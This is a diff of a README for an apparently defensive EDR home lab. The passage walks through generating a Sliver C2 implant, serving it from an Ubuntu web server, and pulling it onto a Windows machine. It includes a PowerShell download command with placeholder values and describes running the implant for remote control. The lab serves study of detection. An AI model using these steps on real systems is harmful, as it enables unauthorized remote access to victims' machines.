GriffinDuck/LimaCharlie-EDR-Lab/README.md

 ## Labbing

-After environment is set up I created a Sliver-Server C2 implant on the Ubuntu server to install on to the Windows System
+After setting up the environment, the next step involved creating a Sliver-Server C2 implant on the Ubuntu server to be installed on the Windows system.

 ![Implant](https://i.imgur.com/LEP0qSk.png)

-Next I created quick websever on the Ubuntu machine for the C2 Payload to be installed from, then I ran this powershell command on the Windows device.
+To facilitate the installation process, a quick web server was set up on the Ubuntu machine.
+This web server would host the C2 payload, allowing it to be easily accessed and downloaded by the Windows device.

+On the Windows system, a PowerShell command was executed to initiate the download and save the C2 implant.
+The specific PowerShell command used was:

 ![IWR](https://i.imgur.com/dadsDeX.png)

-Command: IWR -Uri http://[IpAddress]/[ImplantName] -Outfile [FileLocation]
+IWR -Uri http://[IpAddress]/[ImplantName] -Outfile [FileLocation]

-After downloading the implant we need to run the malicious file
+In this command, [IpAddress] refers to the IP address of the Ubuntu machine hosting the C2 payload, [ImplantName] represents the name of the C2 implant file, and [FileLocation] indicates the desired location on the Windows system where the implant should be saved.

+Once the C2 implant is successfully downloaded onto the Windows device, the next step would involve executing the malicious file.
+This execution grants the C2 infrastructure control over the compromised Windows system, allowing for remote access and potential malicious activities.

 ![Excute](https://i.imgur.com/mkdYQkp.png)